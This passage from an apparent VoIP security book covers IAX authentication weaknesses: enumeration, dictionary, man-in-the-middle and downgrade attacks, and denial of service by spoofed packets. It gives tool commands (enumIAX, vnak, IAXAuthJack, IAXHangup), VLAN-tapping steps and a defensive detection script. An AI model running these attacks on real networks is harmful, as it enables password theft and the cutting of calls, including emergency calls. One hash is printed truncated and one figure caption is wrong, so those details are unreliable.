its password and creates an MD5 hash of the combined values. This MD5 hash is sent over the network to the authenticating device for comparison. The authenticating device, also knowing the challenge and password, will compare the hash received against an MD5 hash based on what it expects to receive. If the MD5 hash generated by the authenticator matches the MD5 hash sent over the network by the endpoint, then the authenticator knows that the correct password was used by the endpoint. If the MD5 hash sent over the network by the endpoint does not match the one created internally by the authenticating device, then the authenticator knows that the correct password was not used (and the endpoint is not successfully authenticated). Figure 5-1 shows an example of the IAX authentication process. It's important to understand that the challenge/response method defends against replay attacks by using unique challenges for every authentication request. An attacker who sniffs the authentication process of an endpoint cannot replay a valid response, as the challenge used to create the hash is valid for that unique authentication request only. The attacker would be trying to replay an MD5 hash that was created with an old challenge tied to another session, which is therefore useless.

Figure 5-1. IAX authentication

[2] All references to IAX refer to IAX2.
[3] Client endpoint is defined as any soft or hard phone that supports the IAX protocol.
[4] See http://tools.ietf.org/id/draft-guy-iax-03.txt/.
[5] Password verifiers are the data that must be stored in order to authenticate a peer. Ideally, password verifiers are not passwords or password equivalents.
IAX Security Attacks

Now that we know the basics of the IAX protocol and its use in authentication, let's discuss some of the many security attacks. In this section, we will discuss the following VoIP attacks on devices using IAX for session setup and media communication:

Username enumeration
Offline dictionary attack (IAX.Brute)
Active dictionary attack
Man-in-the-middle attack
MD5-to-plaintext downgrade attack (IAXAuthJack)
Denial of Service attacks
   Registration Reject
   Call Reject
   HangUP
   Hold/Quelch (IAXHangup)
Username Enumeration

IAX usernames can be enumerated, in a manner similar to the process described in Chapter 3 for the H.323 protocol. Username enumeration of valid IAX users can be completed using the enumIAX tool written by Dustin D. Trammell. When authentication is required between an IAX client and an Asterisk server, the IAX client sends its username and password, as indicated in the architecture depicted in Figure 5-1. In order to enumerate the username, enumIAX can use either sequential username guessing or a dictionary attack. Sequential username guessing creates usernames based on alphanumeric characters (letters a through z and numbers 0 through 9), though these can be updated in the charmap.h file. In contrast, the dictionary attack uses a list of dictionary words from the dict file rather than trying to auto-construct them. As you read this chapter, you will see just how easily the username can be obtained. Complete the following exercise to enumerate IAX usernames:

1. Start Nemesis from the BackTrack Live CD.

2. While booted to the BackTrack Live CD, download enumIAX from http://sourceforge.net/project/showfiles.php?group_id=181899/.

3. Install enumIAX with the following steps:
   tar zxvf enumiax-1.0.tar.gz
   cd enumiax-1.0
   make
   make install
   cd /usr/local/bin

4. At the shell prompt, use the following syntax to start enumIAX under sequential mode, attempting usernames that have between four and eight characters:
   enumiax target-ip-address -m 4 -M 8 -v (e.g., enumiax 172.16.1.100 -m 4 -M 8 -v)

5. Next, use enumIAX under dictionary mode by using the following syntax at the shell prompt:[6]
   enumiax target-ip-address -d dict -v (e.g., enumiax 172.16.1.100 -d dict -v)
Offline Dictionary Attack

Although the IAX MD5 authentication method prevents passwords from being exposed in cleartext and even prevents replay attacks, it is still vulnerable to some common authentication attacks. In particular, an offline dictionary attack presents the risk of compromised security if the system uses weak passwords.

Figure 5-1 depicted the Asterisk server sending a challenge over the network to the IAX endpoint. This challenge is used in creating the endpoint's MD5 authentication response, which is also sent over the network. Because the challenge and the response are both transmitted in cleartext, they are readily available to a passive adversary who might be listening on the network. Thus, while the challenge/response method ensures that the authentication hash is not useful for direct replay, the hash could still be used in conjunction with the challenge to infer the password. Unlike an online brute-force attack, wherein an attacker attempts to authenticate to the server by repeatedly using guessed passwords, an offline dictionary attack allows an attacker to check passwords computationally on his own system. Checking for matching MD5 hashes without accessing the targeted system is not only quicker, it also mitigates the risk of lockout after a certain number of failed attempts. Here is how it works. If a person who knew how to count, but not how to add, wanted to solve the problem of 8 + x = 15, she would need only 7 attempts (1 through 7) before brute-forcing the correct answer. The same idea applies to an offline dictionary attack. If an attacker knows the challenge sent by a server is 214484840 and the resulting MD5 hash is fc7131a20c49c3d96ba3e2e27d27, she can test any given password by concatenating the password with the challenge and computing the MD5. If the result is equal to the hash the attacker sniffed over the network, the attacker has guessed the correct password. See Figures 5-2 and 5-3 for more details.

Figure 5-2. Offline dictionary attack

Notice the last row in Figure 5-3, where the generated MD5 hash matches the sniffed MD5 hash captured over the network. This information allows the attacker to verify that she has identified the correct password, which is 123voiptest. Furthermore, unlike other password attacks, the attacker needs to capture a challenge and MD5 hash only once to carry out the attack. The challenge will always be valid for the MD5 hash sniffed over the network, giving the attacker all the information required to perform a passive attack.

Figure 5-3. Details of the offline dictionary attack

To illustrate how a passive dictionary attack works, I have released a proof-of-concept tool called IAX.Brute. IAX.Brute is a passive dictionary attack tool for implementing the challenge/response authentication method supported in VoIP IAX implementations. Using a dictionary file of 280,000 words, an intercepted challenge, and a valid corresponding hash, IAX.Brute can identify most passwords in less than one minute. (IAX.Brute can be downloaded from http://www.isecpartners.com/tools.html/.) To begin, IAX.Brute requires the user to sniff the challenge and the MD5 hash between two IAX endpoints. This process is an easy task, because both are transmitted over the network in cleartext. Once the user has captured this information, IAX.Brute reveals the password by checking against any dictionary file supplied by the user. (IAX.Brute includes a standard dictionary file with more than 280,000 common passwords.) During this process, IAX.Brute creates an MD5 hash from the user-supplied challenge and a word in the dictionary file. Once the MD5 hash generated by the tool matches the MD5 hash sniffed over the network, the user has successfully compromised the IAX endpoint's password. See Figures 5-4 through 5-6 as examples.

Figure 5-4. The challenge (214484840) and username (voiptest1) sniffed over the network in cleartext

Figure 5-5. The MD5 hash sniffed over the network in cleartext

Figure 5-6. IAX.Brute compromising the password 123voiptest

Notice in Figure 5-6 that IAX.Brute simply walks through four steps to identify the password:

1. IAX.Brute loads its dictionary file. You'll find isec.dict.txt included with the tool, but any dictionary file can be used.

2. User supplies the challenge, which in this case is 214484840.

3. User supplies the MD5 hash that was sniffed over the network. From Figure 5-5 we see that the hash is fc7131a20c49c3d96bf69ba3e2e27d27.

4. IAX.Brute performs the passive dictionary attack and, using these examples, identifies the password as 123voiptest.
Active Dictionary Attack

In addition to passive attacks, IAX is also vulnerable to pre-computed dictionary attacks. Pre-computed attacks require the attacker to take a single challenge and concatenate it with a list of passwords to create a long list of MD5 hashes. Once a list of pre-computed hashes has been created, the attacker takes the same challenge that was used to create all the hashes and issues it to an IAX client endpoint. In order for the attack to work, the victim must already have sent an authentication request packet to the Asterisk server. The attacker then spoofs the response by using the IP address of the Asterisk server, then sends a packet using her own challenge before the real challenge packet from the Asterisk server reaches the client. Additionally, to ensure that the attacker's spoofed packet (using the source IP of the Asterisk server) reaches the victim first, the attacker can create a packet in which the sequence information is low enough for the victim to assume it should be processed before any other challenge packet with a higher sequence number. This will guarantee that the attacker's challenge will be used by the endpoint to create the MD5 authentication hash. When the endpoint receives the challenge from the attacker, it will respond with an MD5 hash derived from the attacker's challenge and its own password. To complete the attack, the attacker simply matches the hash sent by the endpoint to a pre-computed hash created by the attacker. Once the attacker finds a match, the password has been compromised. A way to carry out this attack is to concatenate 101320040 with every word in the English dictionary, which would create a list of pre-computed hashes. Once the list has been created, the only step the attacker needs to complete is to send a packet to the endpoint with the challenge of 101320040. When the endpoint receives the challenge, it will send the MD5 hash over the network. The attacker can simply sniff the response and compare it with the pre-computed list. Once one of the pre-computed MD5 hashes has been matched to the hash captured from the target, the attacker knows the password. Figure 5-7 shows an example of the pre-computed attack using active packet injection.

Figure 5-7. Pre-computed dictionary attack

Notice in Figure 5-7 that the attacker has created a list of pre-computed hashes based on the challenge of 101320040 (shown at the lower left). When the attacker injects that challenge during the endpoint's authentication process, the client creates an MD5 hash using the attacker's challenge. Unlike the passive dictionary attack, wherein the attacker needs to brute-force the password, once the attacker sniffs the MD5 hash over the network, she can simply match the sniffed MD5 hash to one of the pre-computed MD5 hashes. If a match appears, the attacker has just obtained the endpoint's password. In order to demonstrate this issue, the co-author of this chapter (Zane Lackey) has written a tool in Python called vnak (downloadable from http://www.isecpartners.com/tools.html/). Vnak is a tool that can perform many attacks, including a pre-computed dictionary attack (using option 1). Vnak will force a vulnerable endpoint to create an MD5 authentication hash using a challenge sent by an attacker instead of a legitimate server.

Targeted attack

To test vnak in targeted attack mode, you can use the example command shown here:

python vnak.py -e -a 1 ServerIP

Using this syntax, vnak sends a pre-computed challenge to its target. The target then receives the pre-computed challenge, combines it with its password, and sends the resulting MD5 hash back over the network. The attacker then views this hash over the network and uses it to carry out a dictionary attack. The dictionary attack is greatly improved over the offline attack because the attacker already has a list of MD5 hashes that have been created with the pre-computed challenge and various passwords. It should be noted that vnak can perform many other attacks described in this chapter and other chapters, using the following flags:

Option 0   IAX     Authentication downgrade
Option 1   IAX     Known authentication challenge
Option 2   IAX     Call hangup
Option 3   IAX     Call hold/quelch
Option 4   IAX     Registration reject
Option 5   H.323   Registration reject
Option 6   SIP     Registration reject
Option 7   SIP     Call reject
Option 8   SIP     Known authentication challenge
IAX Man-in-the-Middle Attack

In addition to active attacks, IAX's support of the challenge/response authentication method makes it vulnerable to man-in-the-middle attacks. This attack first requires access to the network traffic between the endpoint and the Asterisk server, which can often be obtained via ARP cache poisoning or DNS spoofing techniques. Once an attacker is routing traffic between a legitimate endpoint and the Asterisk server, he has privileged access to the data between them. The attacker can then authenticate to the Asterisk server without knowing a valid username and password. During an attack, the malicious user monitors the network to identify when an IAX endpoint sends an authentication request to the Asterisk server. When the authentication request occurs, the attacker intercepts the packets and prevents them from reaching the real Asterisk server. The attacker then sends his own authentication request to the Asterisk server. Using the challenge/response method for authentication, the Asterisk server sends a challenge to the attacker. The attacker receives the challenge and sends it along to the legitimate endpoint, which is still waiting to authenticate from the first step. The legitimate endpoint then sends a valid MD5 hash to the attacker (derived from the real password and Asterisk's challenge), thinking the attacker is the actual Asterisk server. Once the attacker has the valid MD5 hash from the legitimate endpoint, he sends the hash to the Asterisk server and successfully authenticates. See Figure 5-8 for details.

Figure 5-8. IAX man-in-the-middle attack

The man-in-the-middle attack significantly increases the attack surface on IAX implementations, allowing an attacker to authenticate to the Asterisk server without brute-forcing a single username and password. For more detailed information on performing a man-in-the-middle attack, see Chapter 2 for step-by-step instructions on using Cain & Abel.
MD5-to-Plaintext Downgrade Attack

The IAX protocol specification assumes that important security protections are going to be handled at other network layers, leaving implementations potentially vulnerable to active attacks. This susceptibility to active attacks arises from the fact that the IAX protocol does not provide integrity protection. Integrity protection ensures that the communication occurring between the real Asterisk server and endpoint has not been tampered with on the wire or has been sent from a rogue server or client. Another major issue is the predictability of IAX control frame sequencing. For example, a majority of the sequence numbers used are merely incremented by one in each frame. This allows an attacker to easily predict the values that are needed for injecting spoofed packets. The combination of these issues means that vulnerable IAX implementations can be downgraded to plaintext transmissions during the authentication process. The downgrade attack causes an endpoint, which would normally use an MD5 digest for authentication, to send its password in cleartext. In order to perform this attack, the attacker must complete a few steps. First, the attacker needs to sniff the network,[7] watching for an endpoint attempting to register to the Asterisk server (AS) using a registration request (REGREQ) packet. The attacker then parses out the required values from the REGREQ packet, including the Destination Call ID (DCID), Outbound Sequence Number (oseq), Inbound Sequence Number (iseq), username length, and username. Once the information has been gathered, the attacker needs to increase the iseq value to correspond to the existing session originally created by the AS (making it valid for a spoofed REGAUTH packet). After the sequence information is increased appropriately, the attacker injects a spoofed REGAUTH packet specifying that only plaintext authentication is allowed. If the spoofed packet "wins the race" back to the endpoint (ahead of the AS's real packet that requires MD5 authentication), the endpoint sends another REGREQ packet across the network with the password in plaintext. This allows the attacker to recover the password from the network with a standard sniffer such as Wireshark.[8] See Figure 5-9 for an example.

Figure 5-9. Downgrade attack

Figure 5-9 shows an endpoint attempting to register with the Asterisk server. During the authentication process, the attacker extracts the required session information from this packet. Once the information has been obtained, the attacker injects a REGAUTH packet spoofed from the Asterisk server specifying that only plaintext authentication is allowed. When the endpoint receives this packet, it responds with another REGREQ with the password in plaintext (in Figure 5-9, the sample password 123voiptest is shown). Because this password is sent in plaintext, it can be easily sniffed by an attacker. In order to demonstrate this issue, the co-author of this chapter (Zane Lackey) has written a tool in Python called IAXAuthJack (downloadable from http://www.isecpartners.com/tools.html/). IAXAuthJack is a tool that actively performs an authentication downgrade attack, forcing a vulnerable endpoint to reveal its password in plaintext over the network. To achieve this, IAXAuthJack sniffs the network for traffic indicating that registration is taking place between two IAX endpoints. Once a registration packet has been recognized, the tool then injects a REGAUTH packet, which specifies that the endpoint should authenticate in plaintext rather than MD5 or RSA. The tool has two modes of operation, which are described here.

Targeted attack

To test IAXAuthJack in targeted attack mode, you can use the following example command:

iaxauthjack.py -i eth0 -c EndpointIP -s ServerIP

Using this syntax, IAXAuthJack listens on the eth0 Ethernet interface for control frames from a specific IAX endpoint whose IP address is specified by the -c argument. The ServerIP value in the previous syntax is the IP address of the server with which that endpoint is attempting to register, specified by the -s argument. IAXAuthJack.py then injects the spoofed REGAUTH packet between the server and the endpoint, causing the endpoint to respond with a REGREQ packet with the password in plaintext.

Wildcard attack

By contrast, you can test IAXAuthJack in wildcard attack mode with this command:

iaxauthjack.py -i eth0 -a -s ServerIP

In this example, IAXAuthJack listens on the eth0 interface for control frames from any IAX endpoint that is attempting to register with the server. It then injects the spoofed REGAUTH packet, causing the endpoint to respond with its password in plaintext. See Figure 5-10 for more details.

Figure 5-10. The password in plaintext in the MD5 challenge result field in Wireshark
Denial of Service Attacks

A Denial of Service attack targets the availability of an endpoint, leaving it unusable or unavailable for an extended period of time. It is worth noting that the consequences of DoS attacks differ in severity between one environment and the next. For example, a DoS attack on an NFS daemon may prevent end users from gathering files over the network; however, a DoS attack on a VoIP network might prevent a user from calling 911 in case of an emergency. While any type of DoS attack is undesirable, the severity of a DoS attack on VoIP networks can often be higher because of end users' reliance on voice communication. As with downgrade authentication attacks, predictable session information and a lack of integrity protection open the door for Denial of Service attacks against IAX endpoints. Without these two factors, an active attacker could not spoof the necessary control frames.

Warning ☠

Be aware that using AES encryption to protect the voice traffic of a call does not prevent DoS attacks. These attacks are still possible, because session information is still sent in cleartext.

The following section discusses a few of the DoS attacks identified in the IAX protocol.

Registration Reject

The Registration Reject attack prevents an endpoint from registering to the Asterisk server (AS). An attacker monitors the network for an endpoint that is attempting to register with the AS using a registration request (REGREQ) packet. The attacker then parses out certain required values from the REGREQ packet, such as the Destination Call ID (DCID), Outbound Sequence Number (oseq), Inbound Sequence Number (iseq), username length, and username. Once the information has been extracted, the attacker increases the iseq value by two (e.g., 161 is increased to 163). After the sequence information has been increased appropriately, the attacker injects a spoofed Registration Reject (REGREJ) packet from the AS to the endpoint. However, this attack works only if the attacker's packet reaches the targeted endpoint before the server's REGAUTH packet. Otherwise, the registration process continues normally. See Figure 5-11 for an example.

Figure 5-11 shows an endpoint attempting to register to an Asterisk server. During the authentication process, the attacker pulls the required session information from the REGREQ packet. Once the information has been obtained, the attacker injects a REGREJ packet, specifying that the authentication process has failed. When the endpoint receives the spoofed packet, it thinks that the registration process has failed and ignores the server's MD5 challenge.

Figure 5-11. Registration reject attack
Call Reject

The call reject attack prevents calls from being accepted. In this attack, the attacker monitors the network for indications, such as NEW, ACCEPT, or RINGING packets, that a call is coming in. The attacker then parses out the required information from one of these packets, such as Source Call ID (SCID), Destination Call ID (DCID), Inbound Sequence Number (iseq), and Outbound Sequence Number (oseq). Once the information has been parsed, the attacker manipulates the iseq and oseq values so that the sequence information will be valid for a spoofed REJECT packet. After assembling a packet based on these values, the IP and MAC addresses of the call recipient, and the IP and MAC addresses of the caller, the spoofed REJECT packet is sent to the caller. If the spoofed packet reaches the caller before the call recipient's ANSWER packet, the caller will think the call has been rejected. Otherwise, the call will be established as intended and the spoofed packet will be ignored. See Figure 5-12 for an example.

Figure 5-12. Call reject attack

Figure 5-12 shows an attacker monitoring the network for a call setup packet, in this case RINGING, that indicates when an endpoint is attempting to place a call. The attacker then pulls the required session information from this packet, constructs a spoofed REJECT packet, and injects it into the network traffic. Upon receiving this packet, the endpoint believes the call has been rejected and ignores any further control packets for it.

HangUP

The HangUP attack disconnects calls that are in progress between two endpoints. To initiate the attack, the attacker monitors the network for any traffic that indicates a call is in progress, such as an ANSWER packet, a PING or PONG packet, or a voice packet with audio. The attacker then parses out the following required values from one of these packets: the Source Call ID (SCID), Destination Call ID (DCID), Inbound Sequence Number (iseq), and Outbound Sequence Number (oseq). Once this is complete, the attacker must manipulate the sequence of iseq and oseq values to create a valid spoofed HANGUP packet. Finally, the attacker injects the spoofed HANGUP packet with the now correct information, causing the call to be dropped. See Figure 5-13 for an example.

Figure 5-13. Call hangup attack

Figure 5-13 shows an existing call between two endpoints, with media flowing in both directions. During a phone call, a control frame is sent across the network (a PING in Figure 5-13) that contains the session information needed to complete this attack. From that information, a spoofed HANGUP packet is created and sent to endpoint A. Once endpoint A receives the information, the existing phone call is dropped. At that time, endpoint B is unaware of the HANGUP and continues sending data, but endpoint A will no longer process those incoming packets.

Zane Lackey, co-author of this chapter, has created a tool in Python named IAXHangup.py that automates this attack. The tool can be downloaded from http://www.isecpartners.com/tools.html/. IAXHangup is a tool that disconnects IAX calls. It first monitors the network in order to determine if a call is taking place. Once a call has been identified and a control frame containing session information has been observed, IAXHangup injects a HANGUP control frame into the call to force an endpoint to drop it. The tool has two modes of operation, which are described below:

Targeted attack

To run IAXHangup in targeted mode, interrupting a call between two specific endpoints, use the following syntax:

iaxhangup.py -i eth0 -a 1.1.1.1 -b 2.2.2.2

In this example, the tool listens on the eth0 interface for control frames indicating that a call is taking place between hosts 1.1.1.1 and 2.2.2.2. IAXHangup.py then injects a HANGUP command to disconnect the call.

Wildcard attack

To run IAXHangup in wildcard mode, where it will look for calls between any hosts, use the following syntax:

iaxhangup.py -i eth0 -e

Here, the syntax instructs IAXHangup to listen on the eth0 interface for a call between any hosts on the network and disrupt them with HANGUP control frames accordingly.

Hold (QUELCH)

The Hold attack is aimed at disrupting communication between two endpoints, rather than forcibly disconnecting their call. To achieve this, the Hold attack leverages the QUELCH command in IAX, which is used to halt audio transmission. This attack may be used instead of HangUP if an attacker wants to trick a caller into thinking that a call is still connected, despite the fact that the caller cannot be heard by the user on the other side of the call. The attack occurs by placing one side on hold while not notifying the other side. For this attack, the attacker again monitors the network for any signs that a call is in progress, such as an ANSWER packet, a PING or PONG packet, or a Mini voice packet. The attacker extracts the Source Call ID (SCID), Destination Call ID (DCID), Inbound Sequence Number (iseq), and Outbound Sequence Number (oseq) as before and manipulates the iseq and oseq values so they will be valid for a spoofed Hold (QUELCH) packet. Finally, the attacker injects the spoofed QUELCH packet, causing one side of the conversation to be placed on hold without either of the users' knowledge. See Figure 5-14 for an example.

Figure 5-14 shows an existing call between two endpoints, with media flowing in both directions. During a phone call, control frames are sent across the network (here, a PING) that contain important session information that an attacker needs in order to build a valid spoofed packet. With this information, the attacker can spoof a QUELCH packet and send it to endpoint A. From this point forward, the connection is still live but strictly one-sided. Endpoint A will no longer send media (audio) to endpoint B.

Figure 5-14. Call reject attack
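The downgrade attack and the Registration Reject, HangUP and Hold attacks above share one fingerprint on the wire: an IAX control frame that contradicts the session it claims to belong to. The monitor below is an added example, not part of the book and not Zane Lackey's IAXAuthJack or IAXHangup. It parses IAX2 full frames as RFC 5456 lays them out and applies defender-side checks for both groups of attacks: a REGAUTH offering plaintext only, two REGAUTH replies with different method sets for one REGREQ (the race described above), a REGAUTH arriving after a REGREJ, a REGREQ carrying a PASSWORD information element, and a party that keeps transmitting in a call it supposedly ended with HANGUP or QUELCH. The IP addresses, call numbers, username and frame bytes are constructed for the example, and mini (voice) frames are not parsed.

```python
import struct
from collections import namedtuple

# IAX2 (RFC 5456) constants used by the checks below
FRAME_TYPE_IAX = 0x06
SUBCLASS = {2: "PING", 4: "ACK", 5: "HANGUP", 6: "REJECT", 13: "REGREQ",
            14: "REGAUTH", 15: "REGACK", 16: "REGREJ", 28: "QUELCH"}
IE_USERNAME, IE_PASSWORD, IE_AUTHMETHODS, IE_CHALLENGE = 6, 7, 14, 15
AUTH_PLAINTEXT, AUTH_MD5, AUTH_RSA = 0x0001, 0x0002, 0x0004

FullFrame = namedtuple("FullFrame", "src_call dst_call oseq iseq name ies")


def parse_full_frame(data: bytes) -> FullFrame:
    """Full frame: F|scall(15) R|dcall(15) timestamp(32) oseq iseq type C|subclass, then IEs."""
    if len(data) < 12 or not data[0] & 0x80:
        raise ValueError("not an IAX2 full frame")
    scall, dcall, _ts, oseq, iseq, ftype, sub = struct.unpack("!HHIBBBB", data[:12])
    if ftype != FRAME_TYPE_IAX:
        raise ValueError("not an IAX control frame")
    ies, pos = {}, 12
    while pos + 2 <= len(data):              # each IE is id(8) length(8) data
        ie_id, ie_len = data[pos], data[pos + 1]
        ies[ie_id] = data[pos + 2:pos + 2 + ie_len]
        pos += 2 + ie_len
    name = SUBCLASS.get(sub & 0x7F, f"IAX#{sub & 0x7F}")
    return FullFrame(scall & 0x7FFF, dcall & 0x7FFF, oseq, iseq, name, ies)


def build_full_frame(src_call, dst_call, oseq, iseq, subclass, ies=None):
    """Encoder used only to construct the sample traffic below."""
    hdr = struct.pack("!HHIBBBB", 0x8000 | src_call, dst_call, 0, oseq, iseq,
                      FRAME_TYPE_IAX, subclass)
    return hdr + b"".join(bytes([i, len(v)]) + v for i, v in (ies or {}).items())


class IaxMonitor:
    """Stateful checks over (src_ip, dst_ip, frame bytes); observe() returns alert strings."""

    def __init__(self):
        self.reg = {}    # (endpoint_ip, server_ip, endpoint_call) -> registration state
        self.ended = {}  # (sender_ip, peer_ip, sender_call) -> name of the terminating frame

    def observe(self, src_ip, dst_ip, data):
        f = parse_full_frame(data)
        alerts, where = [], f"{src_ip}->{dst_ip} {f.name}"
        if f.name == "REGREQ":
            self.reg.setdefault((src_ip, dst_ip, f.src_call), {"state": "REQ", "methods": None})
            if IE_PASSWORD in f.ies:
                alerts.append(f"{where}: PASSWORD IE on the wire (plaintext credential)")
        elif f.name in ("REGAUTH", "REGREJ"):
            # server-role frames carry the endpoint's call number in dst_call
            sess = self.reg.setdefault((dst_ip, src_ip, f.dst_call), {"state": "REQ", "methods": None})
            if f.name == "REGREJ":
                sess["state"] = "REJECTED"
            else:
                methods = struct.unpack("!H", f.ies.get(IE_AUTHMETHODS, b"\x00\x00"))[0]
                if methods == AUTH_PLAINTEXT:
                    alerts.append(f"{where}: offers plaintext only (downgrade)")
                if sess["methods"] is not None and sess["methods"] != methods:
                    alerts.append(f"{where}: conflicting REGAUTH replies to one REGREQ (race)")
                if sess["state"] == "REJECTED":
                    alerts.append(f"{where}: REGAUTH after REGREJ; the reject was likely spoofed")
                sess["methods"] = methods
        # a party that hung up, quelched or rejected a call must not keep sending in it
        key = (src_ip, dst_ip, f.src_call)
        if f.name in ("HANGUP", "QUELCH", "REJECT"):
            self.ended[key] = f.name
        elif key in self.ended and f.name != "ACK":
            alerts.append(f"{where}: traffic continues after {self.ended[key]} (spoofed?)")
        return alerts


def run_sample():
    """Constructed traffic: an injected plaintext-only REGAUTH races the server's MD5
    REGAUTH, the endpoint answers in the clear, then a HANGUP 'from' a call peer is
    followed by that peer's own PING. Returns the list of alerts."""
    ep, srv, peer = "10.0.0.20", "10.0.0.5", "10.0.0.21"      # constructed addresses
    user = {IE_USERNAME: b"1001"}
    md5 = {IE_AUTHMETHODS: struct.pack("!H", AUTH_MD5), IE_CHALLENGE: b"12345678"}
    plain = {IE_AUTHMETHODS: struct.pack("!H", AUTH_PLAINTEXT)}
    traffic = [
        (ep, srv, build_full_frame(1, 0, 0, 0, 13, user)),                     # REGREQ
        (srv, ep, build_full_frame(7, 1, 0, 1, 14, {**plain, **user})),        # injected REGAUTH
        (srv, ep, build_full_frame(7, 1, 0, 1, 14, {**md5, **user})),          # genuine REGAUTH
        (ep, srv, build_full_frame(1, 7, 1, 1, 13, {**user, IE_PASSWORD: b"123voiptest"})),
        (peer, ep, build_full_frame(9, 3, 4, 4, 5)),                           # HANGUP
        (peer, ep, build_full_frame(9, 3, 5, 4, 2)),                           # PING afterwards
    ]
    mon, alerts = IaxMonitor(), []
    for src, dst, frame in traffic:
        alerts.extend(mon.observe(src, dst, frame))
    return alerts


if __name__ == "__main__":
    print("\n".join(run_sample()))
```

Run against the constructed traffic, the monitor raises four alerts: the plaintext-only REGAUTH, the conflicting second REGAUTH, the REGREQ that carries a password, and the PING that follows a HANGUP from the same sender. Because the attacker spoofs the server's addresses and call numbers, a source-address check alone would see nothing; the detection rests on the protocol-level contradictions, which is also why the AES media encryption mentioned in the warning above does not help here.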
[6] You may also wish to open the dict file and add extra usernames you wish to brute-force. A few popular ones have already been inserted into the file.
[7] Gaining access to network traffic on a switched network is demonstrated in Chapter 2 with tools like Cain & Abel.
[8] See http://www.wireshark.org/.

Summary

IAX has the potential to be a very popular protocol for VoIP architectures because of the growing popularity of the Asterisk PBX system. Its simple nature, friendliness with network firewalls, reliance on a single UDP port, unified signaling and media transfer protocol, and relatively few network components (no media proxies, gateways, gatekeepers, or STUN servers) make it very attractive. Despite the many operational and functional advantages over SIP or H.323, though, it does not fare much better in terms of security. In fact, the authentication weaknesses of SIP and H.323 are mirrored, and are in some cases worse, in IAX. Furthermore, the lack of use and/or support for encryption in media transfers is very similar between IAX and RTP. Factor in the susceptibility to Denial of Service attacks and IAX, SIP, and H.323 all share a similar vulnerability profile. However, the possible security benefits of IAX, as listed in its RFC, can be achieved once support for proper authentication and encryption appears on IAX endpoints and servers. For example, IAX support for RSA public and private keys would greatly strengthen its authentication model against passive and active network attacks. Additionally, AES encryption based on a sufficiently secure, pre-set shared secret can encrypt media communication. This would prevent passive attackers from eavesdropping on or injecting audio into telephone conversations (as long as the key is not sent over cleartext). However, while proper encryption would prevent eavesdropping and audio injection, IAX will still be susceptible to Denial of Service attacks as long as session information remains in cleartext. Even if encryption is used with IAX, it must continue to guard against design flaws that allow authentication downgrade attacks.
Part II. VOIP SECURITY THREATS

Chapter 6. ATTACKING VOIP INFRASTRUCTURE

VoIP networks are vulnerable to many forms of common network attacks, and devices that support VoIP infrastructure are also vulnerable to similar issues. In this chapter, we will discuss the security weaknesses that affect the functional components that make up a VoIP network, from devices (hard phones, gatekeepers, registrars, and proxies) to applications (e.g., Cisco CallManager, Avaya Call Center/Server, and voicemail applications). Specifically, you will learn about:

Vendor-specific VoIP sniffing
Common hard phone vulnerabilities
Cisco CallManager and Avaya Call Center/Server attacks
Security holes in the Avaya Modular Messaging Voicemail application
Infrastructure server impersonation/redirection

Attacks on general network services that VoIP utilizes, such as DHCP and DNS, are outside the scope of this chapter; however, these services can also be used to compromise a VoIP network (e.g., rogue DHCP/DNS servers re-routing traffic on a VoIP network). In general, this chapter will focus on VoIP technologies only.

Vendor-Specific VoIP Sniffing

Sniffing VoIP network traffic is no different from sniffing a regular network's traffic; however, connecting to the VoIP network is often different than connecting to a regular network. While mail, DNS, and DHCP servers are accessible on corporate VLANs from user workstations, VoIP networks are usually on different VLANs. For example, the VoIP VLAN is segmented from traditional data protocols, such as an organization's Exchange or Active Directory server. Attackers who are not connected to the correct segment between a hard phone and the VoIP network will not be able to sniff the network properly. A separate VLAN can be used for many purposes, including security, Quality of Service (QoS), segmentation, or priority levels. Keep in mind that VoIP packets should be a higher priority than data packets, because a person using a VoIP phone should not be affected by someone's downloading files from a peer-to-peer network. The nature of voice communication demands reliability. The segmentation of VLANs helps ensure that VoIP packets which need a higher QoS are not affected by lower-priority data packets. However, many VoIP vendors will say that using separate VLANs that are not directly accessible from user workstations is a security protection. This assertion could not be further from the truth, as gaining access to the VoIP VLAN is as simple as switching two network cables. Any person can use the VoIP hard phone sitting on a user's desk to gain access to the VoIP VLAN simply by unplugging the workstation's Ethernet cable from the data network and connecting it to the hard phone's VoIP network jack. However, it's important to pay attention to the hard phone's connectivity method. Most hard phones have a built-in Ethernet jack as well as a conversion device, a large black block that resembles a power supply. For example, Avaya hard phones' conversion device has two Ethernet connections, one that connects to the hard phone (labeled Phone) and another that connects to the VoIP VLAN through the wall Ethernet jack (labeled Line). Someone who wishes to sniff the network should unplug the Ethernet cable that is connected to Line on the conversion device and plug it into a hub. The hub should then be connected between the Line jack on the conversion block, the wall jack to the VoIP VLAN, and the attacker's workstation (running a sniffer program like Cain & Abel or Wireshark).

On a Cisco VoIP hard phone, someone who wishes to sniff the network should disconnect the 10/100 SW Ethernet cable from the back side of the phone and plug it into a hub. The person should then connect the hub to the same jack using a second Ethernet cable. Finally, the person should plug a laptop, with Cain & Abel or Wireshark running, into the hub as well. Both the laptop and the VoIP phone (specifically the 10/100 SW jack) should be plugged into the hub. While setting things up, the person should be sure not to plug the 10/100 PC link jack into the hub as that will not be the correct segment to sniff on. Setups like these will allow attackers to sniff the network (even with 802.1x in place) and ensure that the hard phones are still in use. An attacker who does not need the hard phones to be in use can simply connect a workstation to the wall jack itself (assuming that no 802.1x authentication is required). Figure 6-1 shows an example.

Figure 6-1. Sniffing setup on VoIP networks

The setup will allow the workstation to join the VoIP network and sniff the network, with full use of the VoIP hard phone.

Note ✎

If the workstation is connected between the phone jack on the conversion device and the hard phone, the attacker will not be able to sniff the network properly; hence, the architecture for connectivity is quite important.
Hard Phones

Cisco, Avaya, and Polycom hard phones are probably the most popular phones in enterprise networks. Regardless of vendor, though, any type of hard phone comes with security issues. For example, an attacker can compromise the phone's configuration file or simply upload a malicious one. Fortunately, username and password information is usually not stored in the hard phone's configuration file, so the impact an attacker can have if the file is compromised is somewhat mitigated. Instead, the risks of a hard phone's vulnerabilities are general enumeration attacks and Denial of Service (DoS) attacks. The following sections will discuss these VoIP hard phone vulnerabilities:

Compromising the phone's configuration file
Uploading a malicious configuration file
Exploiting weaknesses of SNMP

Compromising the Phone's Configuration File

